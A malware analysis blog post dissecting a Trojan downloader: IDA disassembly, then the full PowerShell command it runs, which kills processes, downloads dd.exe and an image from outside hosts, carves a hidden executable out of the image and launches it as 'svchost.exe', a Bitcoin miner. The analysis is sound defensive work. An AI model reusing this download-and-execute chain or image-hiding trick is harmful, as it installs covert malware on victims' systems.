Skip to main content

Analysis: Trojan.Downloader.9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c

BC Malware

A look over of a Trojan.Downloader I came across on VirusTotal intelligence. Turned out to be a file hiding more secrets than a wife hiding an affair!

There is a single function in the binary, main(), which has been compiled using MinGW: signature,MingWin32 v?.? (h). The segments are pretty standard which makes me think the binary hasn’t been packed: name,.text,.data,.rdata,.bss,.idata according to PEStudio

The function of interest (main) looks as follows:

.text:00401290 ; =============== S U B R O U T I N E =======================================
.text:00401290
.text:00401290 ; Attributes: bp-based frame
.text:00401290
.text:00401290 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00401290                 public _main
.text:00401290 _main           proc near               ; CODE XREF: ___mingw_CRTStartup+E2p
.text:00401290
.text:00401290 Command         = dword ptr -8
.text:00401290 var_4           = dword ptr -4
.text:00401290 argc            = dword ptr  8
.text:00401290 argv            = dword ptr  0Ch
.text:00401290 envp            = dword ptr  10h
.text:00401290
.text:00401290                 push    ebp
.text:00401291                 mov     ebp, esp
.text:00401293                 sub     esp, 8
.text:00401296                 and     esp, 0FFFFFFF0h
.text:00401299                 mov     eax, 0
.text:0040129E                 add     eax, 0Fh
.text:004012A1                 add     eax, 0Fh
.text:004012A4                 shr     eax, 4
.text:004012A7                 shl     eax, 4
.text:004012AA                 mov     [ebp+var_4], eax
.text:004012AD                 mov     eax, [ebp+var_4]
.text:004012B0                 call    __alloca
.text:004012B5                 call    ___main
.text:004012BA                 mov     [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
.text:004012C1                 call    _system
.text:004012C6                 mov     eax, 0
.text:004012CB                 leave
.text:004012CC                 retn
.text:004012CC _main           endp
.text:004012CC
.text:004012CC ; ---------------------------------------------------------------------------

Looking through the above disassembled code there are 2 things to notice.
1. .text:004012BA mov [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
2. .text:004012C1 call _system

Command is the command which will be executed via the system command (http://www.cplusplus.com/reference/cstdlib/system/)

The command which is executed is as follows:

powershell \"Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');\"

So a PowerShell session is loaded and a bunch of commands are executed, which are as follows:

Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;
(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');
(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');
(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');
Start-Sleep -s 10;
(New-Object -com Shell.Application).ShellExecute('svchost.exe');

The script won’t actually run, due to HTTPS issues; but what if… Let’s keep exploring.
The script downloads dd, which is a Unix utility used to convert and copy files. It also downloads an image, saves it as favicon.jpg then converts it to a binary…

That is pretty… odd… It means there is some stenography going on behind the scenes in that image.

To save time cutting out bytes and dissecting favicon.jpg, I’m just going run the dd commands which the script would have otherwise executed.

$ dd.exe if=favicon.jpg of=svchost.exe skip=2931 bs=1
rawwrite dd for windows version 0.6beta3.
Written by John Newbigin <[email protected]>
This program is covered by terms of the GPL Version 2.

skip to 2931
343040+0 records in
343040+0 records out

Things get pretty interesting here. svchost.exe is a valid binary. It was embedded within the image, in a way that didn’t invalidate the image – thus allowing it to be hosted on imagehousing.com! Pretty cool if you ask me!

In any event svchost is a 64bit bitcoin miner 🙂

References

VirusTotal

original binary - https://www.virustotal.com/en/file/9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c/analysis/

favicon.jpg - https://www.virustotal.com/file/43deab7498966d3d955fa23fbfd9cc2d5c363417c8eddd4b8db8e3e0fdeeb28f/analysis/

svchost.exe - https://www.virustotal.com/file/0ab9eed74a03bce3b40e02c77f74718c7110ceadd946484da9227c2f2a76cdbe/analysis/

Tools

  1. PEStudio – https://www.winitor.com/
  2. Hex-Rays IDA